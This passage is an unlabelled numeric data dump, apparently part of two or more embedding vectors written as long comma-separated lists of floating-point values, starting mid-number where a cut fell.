0857472,-0.006147656,-0.019498672,-0.009235308,0.010765088,0.034418233,0.0073510134,0.019030245,0.011578735,-0.0049665296,-0.0067658215,-0.0120403515,-0.010287737,0.00039411546,0.0060952683,-0.0042826347,-0.0012460116,0.0012783543,-0.025740266,0.0010381017,0.027951483,-0.0026898214,-0.003232026,0.014122289,-0.01782793,-0.007803214,-0.03090802,0.014973407,0.009932881,0.00013431923,0.015833337,-0.022488378,-0.012332451,0.016166884,-0.022629213,0.016284628,0.008041554,0.021631533,0.030200228,0.0040339553,-0.022033293,0.009708507,-0.005110863,-0.008405051,-0.016409097,-0.0062743328,-0.014577996,0.015586253,0.013208084,-0.028825374,-0.006908274,0.008440693,-0.018459296,0.005260935,0.019796282,0.0021203682,0.015349086,-0.015502405,-0.0035822545,0.01938925,0.019568918,-0.007306181,0.010347738,0.0083874855,0.017794281,0.012477851,-0.008950563,0.014747753,-0.015077032,-0.0139186885,-0.005821709,0.0151138585,-0.030982202,0.002782723,0.024489038,-0.01288376,-0.00411493,-0.00025268237,-0.0051326966,-0.015828284,-0.0044752876,-0.0030774786,0.016403977,-0.0028789123,-0.008694349,-0.0008610696,0.055757694,0.008140354,0.006911739,0.021174587,0.010630988,-0.017333666,0.0022917334,0.005006383,0.01972601,0.03845383,-0.013947244,-0.019206494,0.027474642,0.006265809,0.014072503,0.012685335,0.00604683,0.025689106,0.012200425,0.013396788,0.013295267,-0.006572928,0.010600291,-0.0063563082,0.006623579,-0.005883371,0.04304706,0.006182063,-0.015556198,-0.010903589,0.009343322,0.02423505,0.0013304484,0.003260954,-0.0066599213,0.0051115486,-0.005360992,-0.0066084983,-0.014571699,0.00618794,-0.026417525,0.006376259,-0.0025918528,-0.0111219445,-0.0061227544,0.0033874246,0.00039007247,-0.00976708,-0.0030383295,0.0001131846,-0.008339715,0.007940021,-0.017055256,-0.038726714,0.0101743,0.011099325,-0.0033391556,0.004813322,0.008037787,-0.018455215,0.01030132,-0.0166533,0.025095599,-0.021536618,-0.005419977,-0.0066354475,0.034646958,0.0082093645,-0.0134756565,0.025839454,-0.01179538,-0.019948833,-0.0035695503,-0.015464405,0.028738877,0.0027258182,-0.013590597,-0.010745588,-0.013552573,0.0047977604,-0.012947439,-0.0058901403,0.021388916,0.011116893,-0.0033792502,0.0039588185,-0.031596266,-0.011445967,0.004287595,0.005569506,-0.010838164,0.00181957,-0.026661148,-0.02150232,-0.019256517,0.016278006,-0.0061494564,-0.009309371,0.020863382,-0.029086374,-0.0124252,-0.020474225,-0.0013600907,-0.0011596911,0.022091232,-0.017343871,0.02908373,0.009590829,0.0133832125,0.007970179,-0.004238477,0.023875458,0.002482243,0.005554921,-0.013212186,0.019974314,-0.019520655,-0.0017665573,0.008185467,-0.012558044,0.024882164,-0.02423214,-0.006601972,-0.008094408,-0.018168433,0.0012990432,0.010643861,-0.0032979771,-0.00079811254,-0.018644119,0.010852549,0.035948392,0.021999672,-0.014476586,0.002250554,0.016744204,0.0023516582,0.01564155,0.012455668,-0.0012699058,0.020035723,0.021615908,0.020605238,0.014245801,-0.0015503499,0.0022208947,-0.020643683,-0.01957758,0.019129619,-0.008647054,-0.0021606237,-0.008312607,0.01780725,-0.025155578,0.005375112,0.020074323,-0.023041578,0.0035876902,-0.00674617,-0.006160524,0.02723352,0.0015669052,0.009147101,-0.00498438,0.018810216,0.00001239165,0.025015542,0.017924018,0.019953119,-0.008330738,0.009352069,-0.01642553,0.007467904,-0.0066082515,-0.019336281,-0.011581132,0.005668264,0.00026380492,-0.0068754144,0.00025312492,0.002221615,-0.011389548,0.014952038,-0.012504231,0.012071969,0.030959558,0.025456117,0.0143846255,0.006798842,-0.008699717,0.015304592,-0.010072719,0.023185685,-0.024997879,-0.015431102,-0.0033120087,0.007720804,0.011619448,0.02863354,-0.014403735,-0.010576396,0.0015601252,-0.0085311085,0.018735493,-0.020328067,-0.0025455179,0.0026462001,-0.002237301,-0.011372492,0.015246666,0.0072965412,-0.0008479123,-0.008365649,0.004153184,0.012247306,0.010191776,0.017952293,0.0061883074,-0.025903624,0.011853589,-0.0046591493,0.0064377757,-0.042269435,-0.023596676,-0.0051807635,0.005309167,-0.008074473,-0.02727666,-0.0124019515,0.034486182,-0.010058144,0.00715193,-0.0017932805,-0.010229851,0.016490065,-0.00014848865,-0.0017672582,0.0020026774,0.007337986,-0.01616647,-0.005287331,0.002253036,-0.01929282,-0.02878694,0.000074547876,0.0034287197,0.02539967,-0.02390393,0.0041582617,0.017166723,0.00058303575,-0.024235474,0.014984468,-0.011245799,0.017501634,0.010104326,0.015705373,0.0025604176,-0.0069400333,-0.005220682,-0.0010813274,0.0021717555,0.011213738,0.013975419,0.010912005,-0.005240378,0.09266425,0.021198137,-0.03204291,0.0018324067,-0.008743744,0.017737174,0.04167755,0.013142853,-0.0030125335,0.015394326,0.008164998,-0.0049255346,-0.0004174543,-0.006023152,-0.014728022,0.025075281,0.04089942,0.010156744,-0.005832007,-0.040283836,0.020654885,-0.03358814,-0.004601965,0.040199835,-0.0065200482,-0.046222117,0.0081305895,0.04566795,0.0036505007,0.023017388,0.0066873506,0.015995353,0.023546025,0.013739281,-0.017582031,-0.00854893,0.02136703,0.00008338653,0.0026234454,0.011253484,0.023869885,0.021084437,0.01239985,-0.019176621,-0.021136383,0.014381911,0.007874585,0.00569858,0.010610979,-0.006344459,0.012274091,0.010327771,0.026605353,0.010389881,0.011624845,0.012351667,0.009269432,-0.016072173,0.012025622,-0.011078146,0.05581884,-0.019992422,0.001235536,0.01480804,0.015205847,-0.0070643015,-0.006412332,0.0029249224,-0.03767517,-0.02804715,0.02305781,-0.020175876,0.0028378814,0.02899699,-0.02585146,0.01824161,-0.00050732633,-0.03669561,0.0024172936,-0.0027861635,0.028000316,0.0007197784,0.012355901,-0.0057076244,0.0073012807,-0.0028626441,-0.00085361185,0.018705135,-0.015727973,0.0028911028,0.0226942,-0.0009870902,0.008118647,-0.0040625506,-0.016219698,0.002043861,0.025903728,0.005573404,0.012412078,0.01914421,0.009440511,-0.0053085694,-0.003514177,-0.0054624346,-0.0131010935,-0.008079626,0.008982897,0.012995338,0.01377426,0.007989183,-0.003184933,-0.0008604509,-0.004989092,-0.008468763,0.0033843212,0.0058041397,0.008615854,-0.03986618,0.021059087,-0.001067095,0.0013604856,0.016301528,0.014617397,0.032949697,0.022827419,0.029157247,-0.0022570489,-0.0038082849,0.02066515,-0.003496371,0.0014870772,-0.044146072,-0.009745571,-0.00020360787,0.010366416,0.0113793425,0.02531348,0.00040864287,0.037271306,0.009443752,0.0011510935,0.0049676374,-0.0286215,0.010676608,-0.00796767,0.0028326982,0.02244736,-0.0076379282,-0.0047983737,-0.0034060106,-0.0139973005,0.015895108,0.013994925,-0.016851014,-0.011051044,-0.019162072,0.0035416062,-0.0069937417,-0.009807859,-0.011321998,0.0019146575,-0.0021462152,0.0058387364,-0.055768643,0.01871848,-0.007908864,-0.001030178,0.007205997,-0.011596853,0.013502008,-0.015988719,-0.03188428,0.005059761,0.029717656,-0.016003514,-0.0057848524,0.011282389,-0.00046338167,-0.0058300444,-0.0008515628,0.011523227,0.018517584,-0.0205596,0.0224975,0.003156516,-0.003906695,0.0043804413,-0.0047825733,-0.0016360023,0.016764617,-0.012441856,0.034079332,-0.012037729,0.014372685,0.014980057,-0.009180684,-0.030122295,0.026186867,-0.013480469,-0.042661373,-0.025508147,-0.0073806196,-0.00009389073,0.0019628482,-0.00039629865,0.007069378,0.00978236,-0.00063905976,-0.013410036,0.020169917,-0.00076193106,-0.0036774685,-0.0025192695,-0.023409083,0.008981554,0.034911424,-0.010512734,-0.011436315,-0.025926596,-0.015040361,-0.0057734763,-0.026142776,-0.0249896,0.0076177074,-0.00007068776,-0.015956499,-0.004901317,0.020257195,-0.0014139684,-0.004191367,0.010992239,0.020159183,-0.01079078,-0.018241012,-0.0031688844,-0.02874433,0.018981786,0.025156844,0.01009704,0.025451584,0.009374441,-0.028750176,-0.011008022,-0.0023543877,-0.018727772,-0.0041464795,0.015719382,-0.0012306487,0.0022969195,-0.026844889,-0.014730164,0.013088855,-0.010668704,-0.01584827,-0.039998636,0.0068117413,-0.001171746,0.0020483576,-0.004936273,-0.023448654,0.0087726535,-0.0137498155,0.013678304,0.016682675,0.012351935,0.0052593,0.031604435,-0.003910867,-0.022405583,-0.010627208,-0.024616675,-0.009328807,-0.017333953,0.005584746,-0.027223855,0.010932153,-0.003968517,-0.016983908,-0.010830786,0.027188249,0.0056832996,-0.020647364,0.015829181,-0.024350515,0.0031584096,-0.015570584,-0.0015397626,0.0029617855,0.022432659,-0.044842,0.009164102,0.049300138,-0.015467456,0.0023230365,0.0147213265,-0.004064646,-0.04515923,-0.014802197,0.03057314,-0.013206415,-0.031290196,-0.04789588,-0.0016151061,0.011172044,-0.013812823,-0.021769295,0.0036008472,0.013190646,0.0013049992,0.045913264,-0.0035487378,0.003389223,0.019733425,-0.008411897,-0.0062882695,-0.017036702,0.013751741,-0.00020436569,-0.018148594,-0.012811994,-0.0009984864,-0.0030587933,0.010650053,0.012437569,-0.0069260206,0.005179102,0.03342657,-0.0014111056,-0.021209694,-0.008477638,0.025903566,-0.012964953,0.013795959,-0.0053301686,-0.012450671,0.00094409625,0.004134852,0.10995548,0.013241346,-0.0069667823,-0.0022335844,-0.010952398,-0.020060422,0.00020941827,0.010727893,0.00046237314,0.0074471654,-0.00006734981,0.0030020305,0.027272604,0.017568516,-0.0030562228,-0.026030194,0.007683996,0.08551331,0.0050076656,0.02365867,0.01695181,0.006124519,0.03291473,0.011773894,0.014335962,-0.04460432,-0.0073379474,-0.03840007,0.0018483937,0.0013935447,-0.0032934283,-0.018220374,0.0025363083,-0.004011776,0.0029203994,0.010673109,-0.018866178,-0.00041124417,-0.026514841,0.0022249513,0.013545857,-0.029717173,-0.0059581134,0.01622521,0.003554848,0.026346678,0.0026347875,-0.008466478,0.012727361,0.023188125,0.022579681,-0.036810238,0.01631189,0.0003650948,0.0009850701,0.015820896,0.012626713,0.014731732,-0.021012109,0.014128182,-0.007555812,0.009898646,-0.028375553,-0.0041120267,-0.0042262403,-0.011283676,0.0097905155,-0.008612182,0.00482746,0.006731578,-0.015386412,0.011907094,-0.015010767,-0.005149543,-0.0034761655,0.017140638,-0.010916156,-0.015711954,0.012566718,-0.009275095,0.0041993577,0.029761983,-0.03260082,-0.01913577,0.01777252,0.03348086,0.0006275853,-0.015090388,-0.008495299,0.014047735,-0.0131728025,-0.005327886,-0.001584292,-0.0020994109,-0.010377978,0.020716937,-0.0021641972,-0.014861803,0.0054422664,0.0011562024,-0.02682297,0.019265277,-0.011866993,0.016446184,0.013911832,0.009744313,-0.017052248,0.0003918936,-0.021572871,0.0068301833,0.014157724,0.020958249,-0.020284383,0.009927139,-0.0261668,-0.0072711506,-0.010092148,0.022235587,-0.028197052,-0.009934525,0.005175908,-0.009522564,0.029622305,0.0076111807,-0.00023301832,-0.0038370606,0.0014602354,-0.012975725,-0.013680587,0.022566866,-0.0071028606,0.012713791,0.018198173,-0.02288994,0.00992282,-0.015459652,-0.0049315845,-0.035902042,0.014997889,-0.011263574,-0.017002277,0.005508392,-0.0042333365,-0.016940579,0.0017389746,-0.0023252482,-0.01060849,0.006530579],[-0.0077754925,-0.00039403434,-0.001384837,0.00017862795,0.0038558515,-0.018464833,0.009536064,0.011273686,0.017809832,-0.0015831874,0.0012144234,0.018957423,-0.015931005,0.0053171576,-0.009532685,0.0132730175,0.015838288,-0.012868619,-0.008307365,-0.0058827796,0.0015858145,-0.017810145,-0.01022426,0.0012653634,0.008456326,0.009449324,0.019293146,-0.031084437,-0.01704707,0.0036076421,0.024678603,0.02387864,0.0010024371,-0.03338969,0.025437051,0.009057309,-0.006857856,0.0036461256,0.008741139,-0.026122093,-0.00017294382,0.00007502873,-0.0066218,0.0077755046,0.0035508655,-0.019715002,0.0029285925,-0.011445743,-0.009099545,0.00038084303,-0.0026962187,-0.0059838956,0.00027147168,0.0167771,-0.0062881513,0.004826346,-0.005559297,-0.015534313,0.010775099,0.0037268256,-0.0061131543,0.017451605,-0.016910633,-0.010446747,0.014319489,0.00006135078,-0.0041717216,0.0031586585,-0.0028597428,-0.009334481,0.028913213,-0.021500826,0.017460804,-0.010538166,-0.0034794777,0.013590067,0.0074109915,-0.008484442,-0.008642313,-0.016382288,-0.031610172,0.00784081,0.00546095,-0.012711704,0.010033181,0.012204131,0.01536816,-0.005975994,0.013688989,-0.017196108,-0.022669334,0.011430042,0.006696936,0.021997038,0.0025979753,0.009844418,0.022791738,-0.00024129238,0.013854222,-0.021412633,-0.024090737,-0.018300304,-0.0332178,0.0072753835,0.0072642914,-0.0056521646,-0.0008587222,0.008680293,-0.001868369,-0.007981597,0.0075464766,0.0022414562,0.012695586,0.00025919505,0.014761352,0.005814661,-0.0035857041,0.009874443,-0.007323611,-0.0032262988,0.012435062,-0.0036988684,0.023143504,-0.00022639456,-0.010759925,-0.0008072971,-0.004445361,-0.00006175263,0.008686761,-0.013855503,-0.002290165,0.012792715,-0.000841541,0.0008701285,-0.0060487404,-0.0029014603,0.0014195519,0.013673538,-0.00366303,-0.027544556,0.0070616826,0.018632026,0.015468658,0.037822254,0.010018679,0.009779018,0.008979916,0.0077895145,0.017096743,0.0043079974,0.014581426,0.013969962,-0.0013011247,-0.0227555,-0.010433279,-0.007955478,-0.018051853,-0.0013143973,0.002353397,0.032249335,0.0065733152,0.0016278669,-0.0033122944,0.02719224,0.014426981,0.009823445,-0.010814248,0.013450138,-0.004486948,-0.017775461,0.016125899,0.015679346,0.0029240716,-0.013866136,-0.011682029,-0.025009856,0.011316705,-0.017103879,-0.018232869,0.030399734,-0.012944721,0.01081779,-0.013386052,0.006501326,-0.0056992923,0.024206292,-0.004398722,0.0029939478,-0.0037152846,0.008063733,0.00798854,-0.00013694927,-0.01852589,0.011721204,-0.019474909,-0.013879193,-0.02083615,0.14209278,-0.0072741285,-0.020419247,-0.008436075,0.00062144594,0.003720228,-0.0057501416,-0.027925776,-0.0018159711,-0.018309629,0.017847901,0.013857505,-0.006868171,-0.011828986,-0.0059924396,0.02928046,0.004427705,0.0051969886,-0.061012585,0.010380202,0.0039328393,-0.012224045,0.025090465,0.027576681,0.0031019961,0.012666938,-0.012143457,-0.019786226,0.008366802,0.01522393,-0.0091366675,0.00521221,-0.0074385204,0.031460907,0.008486966,-0.0145317055,-0.021489512,-0.02985926,-0.039949253,0.000460691,0.006732255,-0.003959836,-0.014591166,-0.016015004,0.011246481,-0.004668691,0.01489774,0.00057923974,-0.021643234,0.012365256,-0.0008747439,0.012186828,-0.02580678,-0.0031931016,-0.01289356,-0.00094642653,0.01849936,-0.0052349246,-0.0060949544,-0.010945155,0.002989337,0.0013231284,-0.000097482065,0.011069057,0.024228606,-0.025795436,0.015442911,-0.0030410995,0.008965943,0.006059243,-0.036254797,-0.023045639,-0.007443851,-0.030321058,-0.0017681114,-0.0005273347,-0.015613229,0.0022553268,0.015856035,0.023848236,0.0027308324,0.014941647,-0.0046104463,0.00051084714,0.004941513,-0.019381773,-0.02101248,-0.03124243,0.00066807226,0.011736356,0.02688054,0.010353258,-0.0045345156,0.0013173218,0.003904219,0.026082134,-0.009324847,-0.0104207685,-0.015136101,-0.01950537,0.008108237,0.008344274,0.0021832178,0.008023794,-0.011400117,0.027576298,-0.0051975423,-0.008723203,-0.010500251,0.011042881,-0.0017089153,0.013235795,0.020006265,-0.015180516,-0.015051278,0.012360455,-0.0017408213,0.0067128884,0.009025018,0.012760858,-0.009089333,0.0077408506,-0.0023554761,-0.008256655,-0.00095201784,-0.006432733,-0.00039045303,0.010903426,-0.016178437,0.066079006,0.0016656434,-0.0127860755,0.024528092,-0.0019291078,-0.009834875,0.0067671766,0.008218861,-0.01854787,0.012131791,-0.0034630208,0.006584918,-0.0015988509,0.017450355,-0.008203446,-0.000794518,-0.007245217,0.013237617,0.0066801426,0.014064259,-0.01955466,-0.007009275,0.033883683,0.014960482,-0.0075716157,0.01006138,-0.021986544,0.02368105,-0.009300557,-0.0032937962,0.00013099187,-0.0052559287,-0.00011924899,-0.0038560918,0.026674328,-0.0045341174,0.009534042,-0.008812761,0.079915226,-0.002644801,0.0013836388,0.0039678845,-0.0015559391,-0.01677592,0.0049926955,0.021116853,-0.0005719551,-0.016870072,-0.03433149,-0.021851754,-0.0018514042,0.019168619,0.007254253,-0.002906344,-0.020395922,0.0056112832,-0.012138089,-0.00032396615,0.03800904,0.00433782,-0.01588326,0.002831966,0.019699115,-0.0052138316,0.00061018206,-0.0044918084,0.008829454,-0.017261425,-0.019609252,-0.022205593,-0.018576693,-0.015260327,-0.036334816,-0.0029586048,0.0016159358,-0.006471258,-0.0037425559,0.0018762671,-0.007962238,-0.0027690467,-0.010085121,0.020912893,-0.013673705,0.011697845,0.023292365,-0.0074814525,-0.0015897427,0.0053497814,-0.0068831854,0.0021189789,-0.019325523,0.018587815,-0.02556459,-0.0008925582,0.006090195,-0.013868083,0.0039617056,0.009666518,0.017134083,0.00939292,-0.027984483,0.031317383,0.0036062726,0.026730016,0.00701971,-0.006247879,-0.014151418,-0.011220471,0.008522044,0.021019578,0.019925067,0.001827871,-0.0002441567,-0.005061768,0.009198331,0.012843778,0.0074339807,-0.0085256705,0.006898303,0.020473886,-0.0075015165,0.007057215,-0.015411144,-0.012644128,0.0062641716,0.0013202464,0.014518604,-0.01378673,0.030428821,0.023630975,0.03569933,-0.012463407,0.012789504,-0.023885448,0.015840469,-0.022393474,-0.0074725286,0.023853732,-0.018348815,0.014150925,-0.008864447,-0.011323519,0.023980102,-0.0048183943,-0.011961352,-0.009179691,0.008747268,0.014680818,-0.017006744,-0.014460129,-0.0235445,0.009237394,0.0012362205,-0.013586959,0.019122904,0.0049382765,-0.025812512,0.024416672,0.014728427,0.006806072,-0.013057186,0.010534982,-0.017896941,0.022570137,-0.024556113,-0.0006497421,0.009029229,0.017638152,0.020239199,0.020484515,-0.0007126831,-0.031967312,-0.0087040765,-0.008202542,0.0031318138,-0.028015409,0.03052189,0.0026301113,-0.019133495,0.012494713,-0.0073457584,0.016958944,-0.0010109814,0.02085753,0.006108446,-0.007810461,0.015279237,-0.0036171617,0.0026028599,-0.010016148,-0.009275958,0.00048244058,0.0011076675,-0.0046976823,0.030505281,-0.016615815,-0.017008021,0.008391233,0.028978098,-0.025276354,0.0041099275,-0.02463701,-0.007827102,0.033747382,-0.02116203,0.07408182,0.0061707534,-0.017582742,0.008209031,0.0045956806,-0.015130511,0.007760468,-0.0008165722,0.0062200413,0.008520747,0.0013300244,-0.02463774,0.0070526996,0.008296911,-0.029269287,0.0022782395,0.011338542,-0.014263715,-0.004436588,0.021319743,0.006515047,-0.00938879,-0.012748789,-0.030970968,-0.023997653,-0.0034573968,0.011812225,0.009036859,-0.0027584464,0.00081964635,-0.03036344,0.0005919776,0.007944719,-0.009152227,0.009444281,-0.003911304,0.0019422655,-0.006368932,-0.016921239,0.01893187,0.016320031,0.020496758,0.021957811,0.025446238,0.004345518,-0.003991614,-0.020313092,0.022017594,0.007756603,-0.012998862,-0.032474242,0.023472006,0.011170167,-0.007083508,0.014047408,-0.018668732,-0.0022533694,0.018259,-0.014152327,0.005716824,0.026564267,0.011791779,0.003312709,-0.03164141,-0.009183001,-0.014414403,0.008343528,-0.0051027527,-0.0036029483,-0.02715327,-0.004846036,0.006103925,0.018614758,0.009392137,0.01500376,0.0055975546,-0.013011607,0.03100823,0.009860042,-0.0076209395,0.0045048986,0.021671448,-0.0037888167,0.0077840965,-0.020787252,0.011780909,0.0058944193,0.016950432,-0.008054283,-0.009893793,0.0071955174,0.0118953725,-0.008041509,-0.0029142764,0.011036446,0.008327786,-0.012081184,0.0079080975,-0.006584371,0.0012675481,0.0162692,-0.019222368,-0.025789835,0.03291003,-0.0037715065,0.025578858,0.0013741236,0.0025718438,0.007913596,0.005534774,-0.009809723,-0.06562147,0.0035146559,0.011470709,0.009315936,-0.0066035795,0.015914613,-0.04000844,0.0050283438,0.005526162,-0.0066550244,-0.0026056697,-0.005751521,0.0012465034,0.002928851,0.00799416,0.0150031885,-0.013293544,-0.021204669,-0.0063805203,-0.06609896,0.012793814,0.0205156,0.0037714299,0.010296443,0.01091095,0.016847953,-0.015926762,-0.005050105,0.0037140762,-0.01631049,0.020168614,0.00403389,0.006948089,0.005319678,-0.030094696,-0.0015103435,-0.0077810865,0.01622455,-0.006315095,-0.0017198469,0.01898462,-0.0070740976,-0.013376904,-0.010067173,-0.0051943194,0.00398826,-0.02489816,-0.0023260906,-0.010850998,0.021281756,-0.009594064,0.015352148,0.004302139,-0.0041236714,-0.0027035952,-0.01314748,-0.00026926844,0.0086659845,-0.007876536,-0.020281138,-0.009141236,-0.012209279,0.0019415087,-0.011010948,-0.001783653,0.014212081,0.014139947,-0.024609648,-0.009878626,0.007155319,-0.016573843,0.0021957802,0.041868202,0.014241512,0.01978306,0.013074621,0.0073417886,0.013914732,-0.004688515,0.002407566,0.016313894,-0.029106956,0.0024791376,0.025485482,0.012006384,0.008645321,0.008259426,-0.012131906,0.0005548635,-0.006593402,0.008651518,-0.005715896,-0.02130286,0.017808154,-0.0078139845,-0.007511076,-0.0017947728,-0.02334061,-0.028536318,0.016741501,0.015068585,-0.0035886685,-0.021721637,-0.028856765,-0.003340814,-0.009385228,-0.012181552,-0.013131443,-0.00224816,0.029173968,-0.0060322853,0.016238412,-0.007803368,0.013288964,0.015905714,0.037989944,-0.016665306,0.011400564,-0.011733454,-0.01087234,0.01139386,0.004694825,0.0018313511,0.0027193646,-0.008591108,0.015306348,-0.016681848,-0.015814545,0.0022917138,0.028314136,0.011234107,0.0025309997,0.003783196,0.0023185054,0.007155177,-0.02451382,0.008948648,-0.0244253,-0.0065769264,-0.016935486,-0.012220403,-0.00081643043,0.007729855,-0.018196318,0.034629192,0.018503072,-0.003963022,0.0068174987,-0.027787855,0.001016939,0.019960823,0.016945643,-0.01609681,-0.011158121,-0.02692445,0.019289527,-0.0000145980075,-0.000806324,0.0057390053,-0.006605261,-0.015856234,0.00039717485,-0.001959839,-0.01756364,-0.001711525,0.0008842957,-0.049234115,0.014135606,0.0029447917,0.010239554,0.004569741,0.011273915,-0.0014986085,-0.01352019,-0.000024164168,-0.034887634,-0.0140334545,-0.0042418675,0.0012753694,0.0001838458,0.0067381524,-0.024340248,-0.0066272602,0.010313881,-0.018685963,0.022359822,0.029776463,0.004067796,0.0046496317,-0.0042945785,-0.003149081,0.0015196722,0.004854368,-0.030575631,-0.0080404,-0.0014297379,-0.005405039,0.037425075,-0.0006665973,0.017215429,0.026866881,0.0021400643,-0.019419285,0.012872236,-0.0109282825,-0.008101144,-0.006012973,0.0036139556,-0.0023642392,-0.017476369,0.020096477,-0.0063886917,0.015117396,0.005212758,0.01782673,0.01124052,-0.014902614,-0.008387478,-0.021993365,-0.015172943,0.007750177,-0.011089136,-0.009855442,-0.0019098758,-0.008789393,-0.009164097,0.01131177,0.014043126,0.02208508,0.021361846,-0.0057120523,0.008560103,-0.003130808,-0.030577105,0.011309088,0.001527547,0.0016928248,-0.0117664365,-0.012229668,0.017201763,0.007609264,0.00012450274,-0.016620144,-0.013925555,0.0068559046,-0.0071233446,0.01980568,-0.0021294889,-0.016265675,-0.002420743,0.018438706,-0.02731318,-0.0039050567,-0.0054870164,-0.0057613873,0.0076374128,-0.03615487,-0.0048657577,0.005720532,-0.015457102,0.029533194,0.0010052149,-0.012540771,-0.012336326,0.031787626,0.041473176,-0.000033413708,-0.0029240828,-0.0109068,0.030212017,-0.0055545378,0.020268064,-0.00649577,0.030764079,-0.011355155,0.0027689082,0.0069561875,-0.014188418,0.03479552,0.0029884535,0.010871568,0.033906676,-0.008861346,-0.009008522,-0.004777865,-0.025827562,0.009273589,0.008449616,-0.0060532778,0.028176026,-0.008753291,0.017650248,0.0021255745,-0.02272372,0.0049081678,-0.0052643716,-0.0058686207,0.017985841,0.009611903,-0.0008876615,0.007233931,0.023437457,0.021677202,-0.002237916,0.01969405,-0.014625803,0.018175904,-0.017435648,-0.0040900633,-0.009539319,0.0058324975,0.0048163463,-0.036176432,0.02962633,0.010296717,-0.012807216,-0.0048440285,0.009761863,0.004977319,0.011112235,-0.0022094958,-0.01221334,-0.0019663542,-0.010147573,-0.013711471,0.013129902,0.016506338,0.021551974,-0.0020074754,0.0043060365,-0.020059789,-0.01932239,0.009951139,0.0043203174,-0.031874478,0.00013469193,0.00094655977,0.01949678,-0.015662748,0.015484259,-0.021293262,0.0010779308,-0.032901652,-0.004839358,-0.0074913017,0.00953821,0.028832277,-0.0134329675,0.011103011,0.025817532,0.022955477,0.0012075693,0.010137728,0.018077804,0.014966845,-0.008262418,0.0008923743,0.004412784,0.0021916993,0.020850249,-0.023548616,0.0026837434,0.004869382,0.0018159675,0.0044086636,-0.005313401,0.004506759,-0.007952193,0.010835625,-0.0034583902,-0.0010029563,0.011790115,0.006245864,-0.008029241,-0.003645411,-0.007132128,0.00094334915,0.0003809733,-0.011353638,-0.006095903,-0.021949451,0.034262825,-0.009424344,0.003052846,0.005351664,-0.030036999,0.0039779856,0.00024084144,-0.0020497649,0.034077972,-0.0094989,0.014938941,0.014574678,0.031806044,0.00805674,0.012194313,0.022643527,-0.003849377,-0.023426693,0.02393883,-0.024718795,0.0005216808,-0.006641083,-0.013444418,0.02961641,0.022366785,-0.016842345,-0.018937701,-0.0031889644,-0.0078083347,0.025298027,-0.004990308,0.0053261505,0.031854294,0.06462295,-0.011393463,0.000866284,0.0077966275,0.010921041,-0.0028036095,-0.0051314323,0.013526817,0.01578411,-0.001155631,0.0027099175,0.02075225,-0.0144657185,0.013775845,-0.00942139,-0.008483256,0.00929964,-0.012067395,-0.008600309,0.001845446,-0.019879118,0.007933974,-0.008876738,-0.03181634,-0.04170808,0.015628397,-0.008537979,-0.021541044,-0.0139559945,0.02608587,-0.017167645,0.0101085,0.010580077,-0.017949032,-0.0055718785,-0.019338047,-0.012584285,0.016405942,0.013632982,-0.027520765,0.0019185437,0.010269063,-0.014347993,-0.011115192,0.015926145,-0.01419566,-0.035144176,-0.02092875,-0.015086003,-0.007194948,-0.027597778,-0.003733691,0.014975166,-0.017119985,-0.008618105,0.007848456,-0.00032045264,-0.003046828,0.026713362,-0.0011683634,-0.014408827,0.0033917672,0.0329603,0.012117064,0.003981367,0.04325253,0.008877593,-0.022821194,-0.00782917,0.0043552774,-0.014077595,0.0019894359,-0.0058747604,0.012919852,0.005518529,0.005071632,-0.0040294165,-0.0176641,-0.00093263516,0.021430315,-0.017720515,0.00028271458,-0.01669874,0.0066505284,0.012874679,0.024218827,-0.018591043,0.0017171744,0.015152765,0.0008151218,-0.010449551,-0.017463075,0.005153472,-0.0078563,-0.015692571,0.006685716,-0.009153094,-0.032007474,0.00059158506,0.01630568,0.018439874,-0.024452997,0.008539784,0.0020023396,0.00744967,-0.0009876443,0.024687212,0.00074925355,0.0067371996,0.0063413554,0.030122152,-0.0003599217,0.016164472,-0.01042989,0.024403932,-0.018218482,-0.021565251,0.017461885,-0.009326643,-0.011978048,0.008676692,-0.035639312,0.006971933,0.0055948836,-0.011696584,0.01765756,0.013554201,0.046051014,-0.014138411,-0.015384462,0.0069098547,0.023837987,-0.0037675034,-0.0029853676,-0.0014322493,0.0031399857,-0.02851503,-0.026863668,-0.011717188,-0.00023825902,-0.028350072,-0.004591105,-0.0019714977,-0.020331599,0.020278657,0.003151885,0.0061501754,-0.010370842,0.02496381,0.0011470392,-0.0036742974,-0.0105618825,0.009207183,0.013267985,0.009292995,-0.0015593657,-0.0012905847,-0.0045098774,-0.021089857,-0.025565144,0.02671185,0.0013216914,-0.0026560563,0.0001454311,0.020732537,-0.023258323,0.0062503596,0.035730463,0.016622132,-0.013065722,0.011186265,0.0004531366,-0.00072647614,0.001148309,0.007424106,0.016203221,0.012109978,0.007012929,0.0160039,0.0010273074,0.02876462,-0.004994117,0.04776697,-0.015107659,0.006652046,-0.02552812,-0.005104286,-0.0023869884,-0.001836241,0.0107682785,0.01194902,0.009766264,-0.015543362,-0.014292439,0.0057621812,-0.035285123,-0.0031683533,-0.0061515598,0.00070751616,0.0027814342,0.011712702,0.018239222,0.0042369864,0.012593169,0.0026010799,0.00011467141,0.0035827775,0.008015333,-0.0030268563,-0.0007902671,-0.024363652,-0.010460628,-0.0052104406,0.013588004,0.013924043,0.0012637055,0.015877388,0.016528986,0.00705849,-0.00869768,-0.01929534,-0.0046778047,0.021540955,-0.033225767,0.09302495,-0.033328105,-0.005423328,-0.008963591,0.00414113,0.010447774,0.004368067,0.009575513,0.023205984,-0.0048970575,-0.010174558,-0.0012462588,0.0059115826,0.0023816489,-0.015164859,0.0012976901,0.014170988,0.013669006,0.009650653,-0.0010094062,-0.0027522624,0.011973849,-0.0050839446,0.010691939,0.015278406,-0.008917146,-0.0038397273,-0.019827425,-0.01326984,0.0010683071,-0.020786377,-0.022750229,0.017110262,0.016035642,0.0150143225,-0.01871246,0.012892892,0.017303383,-0.004405361,-0.015717274,0.027650576,-0.0013161676,-0.0073365173,-0.0054378565,0.023177223,-0.02070644,0.11284953,0.018871259,0.0025837906,-0.019811338,0.015557858,0.008736465,-0.02033053,0.025952794,-0.015750472,-0.0026118015,0.019538226,0.00742022,0.013493266,-0.0046871747,0.0046236804,0.0074103246,-0.02188925,0.013156489,-0.0024584443,-0.036088713,0.0044317753,0.029139252,0.01725132,-0.013245733,0.013549076,0.01736746,-0.010709951,0.0069690347,0.020291278,-0.01591806,-0.003475194,0.008600275,0.0089264605,0.031441957,0.0031472703,-0.07195793,0.000007773139,0.1828156,0.0064270855,0.023098217,-0.0061324015,0.0013010594,0.002126263,-0.041312043,-0.0130590405,-0.025600865,0.005113711,-0.008690028,-0.023106948,-0.0023674564,0.024526037,0.011507308